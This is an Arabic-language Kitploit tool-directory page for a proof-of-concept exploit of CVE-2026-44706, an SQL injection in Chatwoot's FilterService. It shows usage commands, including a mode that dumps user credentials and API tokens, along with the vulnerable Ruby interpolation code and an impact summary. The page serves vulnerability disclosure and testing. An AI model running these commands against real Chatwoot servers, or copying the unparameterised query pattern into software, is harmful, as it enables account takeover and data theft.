Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-44706 — حقن SQL في FilterService في Chatwoot | Kitploit
أدوات/GitHubGitHub/hakaioffsec/cve-2026-44706
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليمأمن قواعد البيانات
GitHubhakaioffsec/cve-2026-44706

CVE-2026-44706

حقن SQL في FilterService في Chatwoot

عرض المستودع
6منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SQL Injection في Chatwoot FilterService

استغلال إثبات-مفهوم (PoC) لثغرة CVE-2026-44706، وهي ثغرة حقن SQL في FilterService#lt_gt_filter_values الخاصة بـ Chatwoot تسمح لأي وكيل مصادق بقراءة قاعدة بيانات PostgreSQL بالكامل بما في ذلك بيانات اعتماد المستخدمين ورموز API. اقرأ المقال الكامل هنا.

الاستخدام:

root@kitploit:~
# Verify injection (boolean-based)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check

# Time-based confirmation
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased

# Extract arbitrary SQL query result
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"

# Dump all user credentials and API tokens
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds

الإصدارات المعرّضة للخطر

  • Chatwoot ≤ 4.11.1

السبب الجذري

في app/services/filter_service.rb (السطر 91)، يتم إدراج مدخلات المستخدم مباشرةً في SQL دون استخدام وسائط ربط (Parameterization):

root@kitploit:~
def lt_gt_filter_values(query_hash)
  value = query_hash['values'][0]          # ← user input, no sanitization
  operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
  "#{operator} '#{value}'::#{attribute_data_type}"   # ← raw interpolation
end

نقاط النهاية المتأثرة

  • POST /api/v1/accounts/:id/conversations/filter
  • POST /api/v1/accounts/:id/contacts/filter

الأثر

CWE-89 حقن SQL. يمكن لأي وكيل/مسؤول مصادق:

  • قراءة قاعدة البيانات بالكامل المستخدمون، الرسائل، الرموز، البيانات عبر الحسابات
  • سرقة بيانات الاعتماد تجزئات bcrypt لكسرها دون اتصال
  • سرقة رموز API انتحال شخصية أي مستخدم بما في ذلك مدراء النظام (SuperAdmins)
  • DoS pg_sleep() لاستنزاف اتصالات قاعدة البيانات

CVSS

8.8 عالية CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

إخلاء المسؤولية

هذه الأداة لأغراض تعليمية وبحثية فقط. استخدمها فقط على الأنظمة التي تملكها أو التي لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

QuimeraX Intelligence

QuimeraX Intelligence هي منصة متقدمة لإدارة سطح الهجوم الخارجي (EASM) واستخبارات التهديدات السيبرانية، متخصصة في تحديد الثغرات الحرجة في الأنظمة المعقدة. تراقب المنصة التهديدات الأمنية وتكتشفها وتنبه العملاء بشأنها بشكل استباقي، مما يضمن الشفافية والاستجابة السريعة للمخاطر المحتملة. يتلقى العملاء إشعارات فورية وتقارير شاملة إذا تم اكتشاف أن أنظمتهم معرّضة للخطر، مما يمكنهم من اتخاذ إجراءات وقائية. اعرف المزيد

Hakai Security

Hakai Security هي شركة أمن سيبراني أسسها محترفون في مجال الأمن، ملتزمة بالتميز التقني. نقدم حلولاً أمنية مخصصة تشمل اختبار الاختراق المتقدم، ومحاكاة الفريق الأحمر (Red Team) الواقعية، وممارسات التطوير الآمن لحماية أصول عملائنا بشكل استباقي من التهديدات السيبرانية المتطورة.

Hacking Club

Hacking Club هي منصة تدريب تتعلم فيها الأمن السيبراني من خلال دروس عملية ومختبرات وتحديات أنشأها خبراء يعملون في شركتنا للاستشارات الأمنية: مباشرة من ساحة المعركة إلى تدريبك. طبّق الثغرة المعروضة في هذا المستودع عبر Hacking Club! اعرف المزيد

تنزيل الأداة